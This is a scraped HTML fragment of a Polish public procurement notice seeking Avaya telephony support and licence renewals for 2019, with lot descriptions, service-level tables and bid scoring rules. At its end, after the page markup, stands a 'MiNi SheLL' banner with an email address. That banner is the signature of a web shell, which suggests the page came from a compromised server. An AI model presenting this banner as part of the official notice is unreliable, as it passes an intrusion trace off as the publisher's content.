id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiana postanowień niniejszej Umowy w stosunku do treści oferty złożonej przez Wykonawcę w toku postępowania o udzielenie zamówienia publicznego obejmującego Przedmiot Zamówienia (w tym terminu wykonania Umowy) możliwa jest:a.	w przypadku zaistnienia Siły Wyższej uniemożliwiającej dostarczenie przedmiotu Umowy w terminie wskazanym w Umowie - dopuszcza się możliwość zmiany terminu dostawy przedmiotu Umowy poprzez jego wydłużenie o czas odpowiadający czasowi występowania Siły Wyższej.b.	w przypadku zmiany stawki podatku od towarów i usług (VAT) - w tym przypadku może ulec zmianie wynagrodzenie Wykonawcy o kwotę wynikającą ze zmienionych stawek ww. podatku obowiązujących w dacie powstania obowiązku podatkowego w trakcie trwania Umowy, c.	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy,d.	w przypadku zmiany miejsca dostawy, użytkowania, wykonywania świadczeń gwarancyjnych, świadczenia usług stanowiących przedmiot Umowy, oraz zmian adresów tych miejsc w wyniku zmian organizacyjnych i/lub zmiany adresów Zamawiającego.2.	Wszelkie zmiany niniejszej Umowy wymagają porozumienia Stron oraz zachowania formy pisemnej pod rygorem nieważności. 3.	Ustala się, iż nie stanowi zmiany Umowy w rozumieniu art. 144 PZP:a.	zmiana danych rejestrowych Stron,b.	zmiana osób zaangażowanych w realizację Umowy tj. koordynatorów Stron,c.	zmiana danych teleadresowych.4.	Zaistnienie okoliczności, o których mowa w powyższym punkcie wymaga jedynie niezwłocznego pisemnego zawiadomienia drugiej Strony, o ile Umowa nie zastrzega wymogu uzyskania zgody drugiej Strony. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Przedłużenie wsparcia serwisowego producenta AVAYA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1Przedłużenie wsparcia serwisowego producenta dla elementów określonych poniżej na okres 01.01.2019 r. - 31.12.2019 r.Przedłużenie wsparcia producenta na urządzenia DATA:Element:	Ilość:ERS 4826GTS-PWR+ with 24 10/100/1000 802.3at PoE+ &2 SFP ports plus 2 SFP+ ports & HiStack ports. Inc. Base Software License, 1 Field replaceable 1000W PSU & 46cm stack cable. EU PC	20 szt.Przedłużenie wsparcia producenta na system telekomunikacyjny:Element:	Ilość:SA ESS AAEP6 PER PT 1YPP	15 szt.AVAYA SA ESS AAEP6 PER PT CONN CM6 1YPP	15 szt.AVAYA SA ESS AES R6 BSC TSAPI 1YPP	15 szt.AVAYA SA ESS C/D AURATM R6 ANLG 1YPP	58 szt.AVAYA SA ESS C/D AURA R6 FND 1YPP	1050 szt.SA ESS C/D CCR6 ELITE AGT 1-100 1YPP	17 szt.Realizacja usługi nastąpi poprzez dostarczenie certyfikatu producenta sprzętu oraz dostarczenie odpowiednich licencji, w szczególności na system automatycznego lektora.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71356300-1, 64215000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 150000,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas dostawy licencji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>5.	Cena określa łączną wartość brutto złożonej przez Wykonawcę oferty. Liczba punktów w kryterium Cena, jaką oferta otrzyma od komisji przetargowej zostanie obliczona na podstawie poniższego wzoru:C= (Cmin/Cof) *60gdzie:C - liczba punktów jakie otrzyma badana oferta za kryterium ,,Cena",Cmin - najniższa cena wykonania przedmiotu zamówienia spośród wszystkich ważnych i nie odrzuconych ofert,Cof - cena badanej oferty.Wykonanie działań rachunkowych opisanych wzorem, zaokrąglone do setnych punktów, zgodnie z zasadą iż części 1/1000, 2/1000, 3/1000, 4/1000 i dalsze zaokrąglane będą ,,w dół", a części 5/1000, 6/1000, 7/1000, 8/1000, 9/1000 i dalsze zaokrąglane będą ,,w górę".W ramach kryterium Czas dostawy licencji (Część 1) każda oferta może uzyskać maksymalnie 40 punktów. Maksymalny czas dostawy licencji, jaki może zaproponować wykonawca wynosi 10 dni kalendarzowych od daty zawarcia umowy. Ocena punktowa zostanie dokonana zgodnie z następującą tabelą:L.p.	Czas dostawy licencji	Liczba punktów1.	Czas dostawy licencji w terminie do 5 dni kalendarzowych od daty zawarcia umowy	402.	Czas dostawy licencji w terminie do 7 dni kalendarzowych od daty zawarcia umowy	203.	Czas dostawy licencji w terminie do 10 dni kalendarzowych od daty zawarcia umowy	0<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Wsparcie utrzymaniowe systemu telefonii stacjonarnej AVAYA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W ramach Części 2 Wykonawca będzie świadczył następujące usługi:1.	Usługi Administracyjne - testowanie, pomiary, diagnostyka oraz zmiany, w szczególności:1)	zmiany uprawnień dla abonentów,2)	dodawanie nowych stacji i użytkowników,3)	narzucanie kodów dostępu,4)	programowanie aparatów (nie dotyczy programowania aparatów możliwego do wykonania z poziomu użytkownika),5)	realizacja dodatkowych usług dla abonentów w ramach posiadanych przez Zamawiającego licencji,6)	diagnozowanie Systemu Avaya na podstawie zgłoszenia zdarzenia uzyskanego od Zamawiającego,7)	wprowadzanie i testowanie zmian w Systemie na podstawie uzyskanych informacji diagnostycznych,8)	zdalne łączenie się z Systemem w celu dokonywania pomiarów, diagnostyki, raportów, testów oraz zmian w Systemie,9)	systematyczny monitoring stanu Systemów Avaya,10)	monitoring łączy zewnętrznych (cyfrowych, analogowych, IP),11)	usuwanie usterek łączy zewnętrznych (w zakresie dostępnym za pomocą oprogramowania administracyjnego),12)	wykonanie software'owych testów aparatów,13)	tworzenie grup abonenckich i skilli,14)	dokonywanie zmian w Systemie,15)	Obsługa oraz wsparcie techniczne dla urządzeń i systemów wymienionych dla cz. 1 i cz. 2 w pkt. 4.316)	wykonywanie usług związanych z rozbudową Systemu Avaya w ramach istniejącej wersji,17)	instalacja aktualizacji oprogramowania producenta,18)	modyfikacje drzewa IVR i komunikatów głosowych,19)	zmiany konfiguracji i/lub parametrów Call Center,20)	udzielenie pomocy i wsparcia technicznego podczas planowanej zmiany lokalizacji GITD,21)	aktywacja oraz sprawdzenie prawidłowości licencji posiadanych przez Zamawiającego na wsparcie producenta urządzeń,22)	systematyczny monitoring oraz konfiguracja systemu taryfikacji Telbaza SQL,23)	administracja systemem IP-Dect (aktualizacja, konfiguracja,monitoring systemu),24)	wykonywanie zestawień z systemu taryfikacyjnego,25)	tworzenie/nagrywanie komunikatów na życzenie (posiadanie licencjonowanego programu do syntezy mowy),26)	administracja systemem Basic Call Management System (aktualizacja, konfiguracja),27)	administracja systemem Avaya Contact Recorder (aktualizacja, konfiguracja),28)	Diagnozowanie i naprawy usterek sprzętu fizycznego (serwerów, media gateways) na którym działają usługi centrali Avaya(koszty zakupu części potrzebnych do napraw ponosi zamawiający). Konsultacje techniczne obejmujące, w szczególności:1)	konsultacje dotyczące łączy zewnętrznych systemu,2)	konsultacje dotyczące łączy wewnętrznych systemu,3)	konsultacje dotyczące obsługi terminali systemowych, aparatów analogowych, oraz IP podłączonych do systemu,4)	informacje na temat funkcji i usług dostępnych w systemie,5)	optymalizacja pracy systemu,6)	przekierowanie ruchu telefonicznego w sytuacjach awaryjnych,7)	udzielanie informacji oraz obsługa z zakresu terminala administrującego,8)	konsultacje dotyczące oprogramowania administracyjnego,9)	konsultacje dotyczące możliwości rozbudowy systemu,10)	konsultacje dotyczące możliwości unowocześnienia systemu,11)	konsultacje dotyczące możliwości podłączenia urządzeń zewnętrznych do systemu (np. programy wspomagające Call Center, aplikacje CTI, systemy ERP/CRM),12)	konsultacje w zakresie obsługi systemu poczty głosowej,13)	konsultacje w zakresie obsługi systemu taryfikacji Telbaza SQL,14)	konsultacje w zakresie obsługi systemu nagrywania połączeń,15)	konsultacje w zakresie optymalizacji pracy Call Center. Realizacja zgłoszeń:1)	Zgłoszenia będą dokonywane przez Zamawiającego i realizowane przez Wykonawcę w dni pracy urzędu Zamawiającego od godziny 08:15 do 16:15 z tym jednak zastrzeżeniem, że w przypadku gdy realizacja zgłoszenia przekroczy godzinę 16:15 to wydłuży się ona o czas niezbędny do jego realizacji, zgodnie z Czasem realizacji wskazanym poniżej. Poniżej załączona tabela czasów reakcji i realizacji zgłoszeń.Priorytet Zgłoszenia	Czas reakcji	Czas realizacjiZgłoszenie Krytyczne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 6 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,Zgłoszenie Ważne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 12 godzinZgłoszenie Drobne	do 2 godzin - w przypadku zaoferowania przez Wykonawcę w formularzu oferty krótszego terminu wiążący jest termin krótszy,	do 24 godzinKlasyfikacja zgłoszeń:a)	Zgłoszenie KRYTYCZNE - obejmują usterki uniemożliwiające pracę użytkowników GITD poprzez brak komunikacji telefonicznej wewnętrznej lub zewnętrznej.b)	Zgłoszenie WAŻNE - praca użytkowników GITD nie jest niemożliwa, ale jest utrudniona.c)	Zgłoszenie DROBNE - Wykonawca dokonuje prostej zmiany konfiguracyjnej nie mającej wpływu na stabilność systemu.3)	REALIZACJA - wykonanie zgłoszenia przez Wykonawcę, w szczególności poprzez dokonanie zmian w konfiguracji centrali telefonicznej lub innych urządzeń wchodzących w skład systemu skutkujące w przypadku Zgłoszenia Krytycznego lub Ważnego przywróceniem prawidłowego funkcjonowania systemu, zaś w przypadku Zgłoszenia Drobnego zmianą konfiguracji.4)	CZAS REALIZACJI - czas liczony od momentu przekazania zgłoszenia do momentu realizacji Zgłoszenia; do czasu realizacji wliczany jest czas reakcji.5)	CZAS REAKCJI - czas liczony od momentu przekazania zgłoszenia do chwili podjęcia działań zmierzających do jego realizacji lub usunięcia usterki.6)	ZGŁOSZENIE - przekazanie zgłoszenia może się odbyć przez e-mail lub telefonicznie lub za pośrednictwem aplikacji WWW.7)	Udzielenie wsparcia proaktywnego a w tym:a)	przegląd logów i rozwiązywanie ewentualnych problemów (nie rzadziej niż raz na miesiąc),b)	sprawdzenie i ewentualna aktualizacja firmware (nie rzadziej niż raz na miesiąc),c)	sprawdzenie i ewentualna aktualizacja oprogramowania (nie rzadziej niż raz na miesiąc),d)	optymalizacja i zalecenia oraz (po konsultacji) wdrożenie usprawnień (nie rzadziej niż raz na miesiąc),e)	testy funkcjonalne środowiska oraz testy prawidłowości konfiguracji włącznie z wykrytymi podatnościami oraz sposobami i zaleceniami ich usunięcia (nie rzadziej niż raz na miesiąc);8)	Wdrażanie nowych rozwiązań i konfiguracji w porozumieniu z Zamawiającym;9)	Zapewnienie możliwości telefonicznych konsultacji rozwiązań dotyczących sprzętu podlegającego opiece;10)	Dokonywanie napraw nieprawidłowo działającej konfiguracji infrastruktury Zamawiającego (naprawą nie jest objęty sprzęt i urządzenia techniczne);11)	Zapewnienia kanału zgłoszeniowego działającego w trybie ciągłym w czasie wskazanym w pkt 1), np. e-mail, aplikacja WWW;12)	Prace rozwojowe polegające na konfiguracji nowych funkcjonalności w tym tworzenie nowych rozwiązań IVR. Zamawiający przewiduje wykorzystanie maksymalnie 300 roboczogodzin.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71356300-1, 64215000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 100000,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas realizacji zgłoszeń z priorytetem krytycznym</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas reakcji</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>5.	Cena określa łączną wartość brutto złożonej przez Wykonawcę oferty. Liczba punktów w kryterium Cena, jaką oferta otrzyma od komisji przetargowej zostanie obliczona na podstawie poniższego wzoru:C= (Cmin/Cof) *60gdzie:C - liczba punktów jakie otrzyma badana oferta za kryterium ,,Cena",Cmin - najniższa cena wykonania przedmiotu zamówienia spośród wszystkich ważnych i nie odrzuconych ofert,Cof - cena badanej oferty.Wykonanie działań rachunkowych opisanych wzorem, zaokrąglone do setnych punktów, zgodnie z zasadą iż części 1/1000, 2/1000, 3/1000, 4/1000 i dalsze zaokrąglane będą ,,w dół", a części 5/1000, 6/1000, 7/1000, 8/1000, 9/1000 i dalsze zaokrąglane będą ,,w górę".W ramach kryterium Czas realizacji zgłoszeń z priorytetem krytycznym (Część 2) każda oferta może uzyskać maksymalnie 20 punktów. Maksymalny czas realizacji zgłoszeń z priorytetem krytycznym, jaki może zaproponować wykonawca wynosi 4 godziny od dokonania zgłoszenia przez pracowników zamawiającego. Przez priorytet krytyczny Zamawiający rozumie taką usterkę, która uniemożliwia pracę użytkowników GITD poprzez brak komunikacji telefonicznej wewnętrznej oraz zewnętrznej. Ocena punktowa zostanie dokonana zgodnie z następującą tabelą:L.p.	Czas realizacji zgłoszeń z priorytetem krytycznym	Liczba punktów1.	Czas realizacji do 2 godzin	202.	Czas realizacji do 3 godzin	103.	Czas realizacji do 4 godzin	08.	W ramach kryterium Czas reakcji (Części 2) każda oferta może uzyskać maksymalnie 20 punktów. Maksymalny czas reakcji na każde zgłoszenie, jaki może zaproponować Wykonawca wynosi 2 godziny od momentu dokonania zgłoszenia. Ocena punktowa zostanie dokonana zgodnie z następującą tabelą:L.p.	Czas reakcji Liczba punktów1.	Czas reakcji do 30 min. od momentu zgłoszenia	202.	Czas reakcji do 1 godziny od momentu zgłoszenia	103.	Czas reakcji do 2 godzin od momentu zgłoszenia	0<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com